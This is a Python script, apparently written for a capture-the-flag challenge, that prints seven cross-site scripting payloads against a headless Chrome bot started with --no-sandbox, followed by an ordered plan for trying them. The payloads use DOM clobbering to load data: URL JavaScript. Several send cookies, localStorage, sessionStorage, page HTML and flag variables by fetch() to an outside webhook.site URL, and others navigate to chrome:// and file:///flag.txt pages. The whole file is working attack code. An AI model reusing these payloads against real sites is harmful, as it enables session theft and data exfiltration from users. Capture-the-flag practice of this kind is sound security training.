#!/usr/bin/env python3
"""
ALTERNATIVE PAYLOADS - When CDP doesn't work
Based on different --no-sandbox exploitation techniques
"""

import urllib.parse
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

print("=" * 80)
print("ALTERNATIVE EXPLOITATION METHODS")
print("=" * 80)
print("\nTry these payloads in order if CDP didn't work:\n")

# PAYLOAD 1: Simple confirmation that XSS works
print("\n1️⃣  PAYLOAD 1: Confirm XSS Works")
print("=" * 80)
payload1 = f'<form id="errorReporter"><input name="path" value="data:text/javascript,fetch(\'{WEBHOOK}?test=xss_works\')"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
print(payload1)
print("\n→ If webhook receives this, XSS is working!\n")

# PAYLOAD 2: Navigate to chrome://inspect
print("\n2️⃣  PAYLOAD 2: Navigate to chrome://inspect/#pages")
print("=" * 80)
payload2 = f'<form id="errorReporter"><input name="path" value="data:text/javascript,setTimeout(()=>{{window.location=\'chrome://inspect/%23pages\'}},100)"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
print(payload2)
print("\n→ Tries to navigate to Chrome's internal inspect page")
print("→ You won't see webhook response, but bot might reveal flag in UI\n")

# PAYLOAD 3: Delayed cookie check (maybe flag is set after page load)
print("\n3️⃣  PAYLOAD 3: Delayed Cookie Check (5 seconds)")
print("=" * 80)
code3 = f"""
setTimeout(() => {{
    const data = {{
        cookie: document.cookie,
        location: location.href,
        title: document.title,
        storage: {{...localStorage}},
        windowProps: Object.keys(window).filter(k => k.toLowerCase().includes('flag'))
    }};
    fetch('{WEBHOOK}', {{
        method: 'POST',
        body: JSON.stringify(data)
    }});
}}, 5000);
""".replace('\n', ' ')
encoded3 = urllib.parse.quote(code3)
payload3 = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{encoded3}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
print(payload3)
print("\n→ Waits 5 seconds before checking cookie/storage")
print("→ Maybe flag is set asynchronously\n")

# PAYLOAD 4: Try navigation to file:// URLs
print("\n4️⃣  PAYLOAD 4: Navigate to file:// URL")
print("=" * 80)
payload4 = '<form id="errorReporter"><input name="path" value="data:text/javascript,window.location=\'file:///flag.txt\'"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
print(payload4)
print("\n→ Different from fetch() - actually navigates to file://")
print("→ Might work with --no-sandbox\n")

# PAYLOAD 5: Try chrome://version (simpler test)
print("\n5️⃣  PAYLOAD 5: Navigate to chrome://version")
print("=" * 80)
payload5 = '<form id="errorReporter"><input name="path" value="data:text/javascript,window.location=\'chrome://version\'"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
print(payload5)
print("\n→ Tests if ANY chrome:// URLs are accessible")
print("→ chrome://version shows browser info\n")

# PAYLOAD 6: Check for window.FLAG multiple times
print("\n6️⃣  PAYLOAD 6: Poll for window.FLAG")
print("=" * 80)
code6 = f"""
let attempts = 0;
const check = setInterval(() => {{
    attempts++;
    if (window.FLAG || window.flag || document.cookie) {{
        fetch('{WEBHOOK}?flag=' + encodeURIComponent(window.FLAG || window.flag || document.cookie));
        clearInterval(check);
    }}
    if (attempts > 10) {{
        fetch('{WEBHOOK}?error=flag_not_found_after_10_attempts');
        clearInterval(check);
    }}
}}, 1000);
""".replace('\n', ' ')
encoded6 = urllib.parse.quote(code6)
payload6 = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{encoded6}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
print(payload6)
print("\n→ Checks every second for 10 seconds")
print("→ Maybe flag appears in window.FLAG after delay\n")

# PAYLOAD 7: Comprehensive data dump
print("\n7️⃣  PAYLOAD 7: Everything at Once (Comprehensive)")
print("=" * 80)
code7 = f"""
(async () => {{
    const data = {{
        timestamp: Date.now(),
        cookie: document.cookie,
        storage: {{
            local: Object.keys(localStorage).map(k => ({{key: k, val: localStorage[k]}})),
            session: Object.keys(sessionStorage).map(k => ({{key: k, val: sessionStorage[k]}})
        }},
        location: {{
            href: location.href,
            origin: location.origin,
            pathname: location.pathname
        }},
        document: {{
            title: document.title,
            referrer: document.referrer,
            domain: document.domain
        }},
        window: {{
            FLAG: window.FLAG,
            flag: window.flag,
            flagKeys: Object.keys(window).filter(k => k.toLowerCase().includes('flag'))
        }},
        html: document.body.innerHTML.substring(0, 500)
    }};
    await fetch('{WEBHOOK}', {{method: 'POST', body: JSON.stringify(data, null, 2)}});
}})();
""".replace('\n', ' ')
encoded7 = urllib.parse.quote(code7)
payload7 = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{encoded7}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
print(payload7)
print("\n→ Sends everything available to webhook")
print("→ Good for debugging what's actually accessible\n")

print("=" * 80)
print("TESTING ORDER:")
print("=" * 80)
print("\n1. Try PAYLOAD 1 first to confirm XSS works")
print("2. If XSS works, try PAYLOAD 7 to see what data is available")
print("3. If still no flag, try PAYLOAD 3 (delayed check)")
print("4. Try PAYLOAD 2 or 5 (chrome:// navigation)")
print("5. Try PAYLOAD 6 (polling for flag)")
print("\n" + "=" * 80)